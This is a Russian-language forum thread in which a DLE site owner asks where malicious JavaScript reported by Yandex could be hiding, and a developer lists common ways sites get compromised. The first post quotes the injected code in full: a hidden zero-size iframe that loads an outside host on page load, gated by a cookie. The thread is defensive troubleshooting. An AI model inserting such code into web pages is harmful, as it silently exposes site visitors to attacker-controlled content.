devil331 0 Опубликовано: 8 августа 2013 Рассказать Опубликовано: 8 августа 2013 (изменено) Здравствуйте. Помогите у меня на сайте яндекс нашел вредоносный код, написал в подержку они ответили что При проверке Вашего сайта антивирусный комплекс Яндекса обнаружил в .js-скриптах вредоносный код следующего содержания: var ifFOiH7f = document.createElement('iframe');ifFOiH7f.name = 'ifFOiH7f';ifFOiH7f.src = 'http://ruty.shan38.com/';ifFOiH7f.style.width = '0px';ifFOiH7f.style.height = '0px';window.onload = function() {if (document.cookie.indexOf('ifFOiH7f=') == -1) { document.getElementsByTagName('body')[0].appendChild(ifFOiH7f); document.cookie = 'ifFOiH7f=yes; path=/; expires=Wednesday, 18-May-33 03:33:20 GMT';}}; Где может быть эта гадость? Зарание спасибо. Написалбы в платную подержку дле но я сегодня тольеко зарегистрировался на форуме, доступ еще не получил Изменено 8 августа 2013 пользователем devil331 Цитата Ссылка на сообщение Поделиться на других сайтах
Горец 0 Опубликовано: 8 августа 2013 Рассказать Опубликовано: 8 августа 2013 Где может быть эта гадость? Да собственно где угодно в куче файлов Вашего скрипта, также этот код может быть в зашифрованном виде... Так по коду никто не скажет, искать ручками надо... Цитата Ссылка на сообщение Поделиться на других сайтах
devil331 0 Опубликовано: 8 августа 2013 Рассказать Опубликовано: 8 августа 2013 (изменено) Автор нашел эту гадость только в одному файле, удалил. Интересно как это попало в двиг, походу зря покупал движек дле) ломают как хотят блин Изменено 8 августа 2013 пользователем devil331 Цитата Ссылка на сообщение Поделиться на других сайтах
prikindel 255 Опубликовано: 8 августа 2013 Рассказать Опубликовано: 8 августа 2013 нашел эту гадость только в одному файле, удалил. Интересно как это попало в двиг, походу зря покупал движек дле) ломают как хотят блин лично вы - зря покупали Цитата Ссылка на сообщение Поделиться на других сайтах
alex32 942 Опубликовано: 8 августа 2013 Рассказать Опубликовано: 8 августа 2013 походу зря покупал движек дле Совершенно зря. Цитата Ссылка на сообщение Поделиться на других сайтах
webmishail 0 Опубликовано: 8 августа 2013 Рассказать Опубликовано: 8 августа 2013 нашел эту гадость только в одному файле, удалил. Интересно как это попало в двиг, походу зря покупал движек дле) ломают как хотят блин лично вы - зря покупали очень зря Цитата Ссылка на сообщение Поделиться на других сайтах
devil331 0 Опубликовано: 8 августа 2013 Рассказать Опубликовано: 8 августа 2013 Автор Больше не совершу такой ошибки. Спасибо Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 076 Опубликовано: 9 августа 2013 Рассказать Опубликовано: 9 августа 2013 devil331, Глупо полагать, что от того что вы купили лицензию, ваш сайт стал в одночасье неуязвим. Во первых достаточно поставить какой либо некорректый сторонний модуль, чтобы скопроментировать весь сайт. Во вторых если вы раньше пользовались нелегальной копией и у вас был шелл на сервере, то от того что вы обновились он никуда не денется и вся система будет продолжать уставаться уязвимой. В третьих достаточно украсть у вас например FTP доступ. В четвертых достаточно поставит "левый" шаблон и у вас могу появится вредоносные JS скрипты И т.д. и т.п. Причин по которым у вас появилась проблема может быть тысячи. Безопасность вашего сайта зависит напрямую от вас, а не от кого то другого, и если вы не сможете обеспечить элементарную безопасность, то вам ничего не поможет. Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.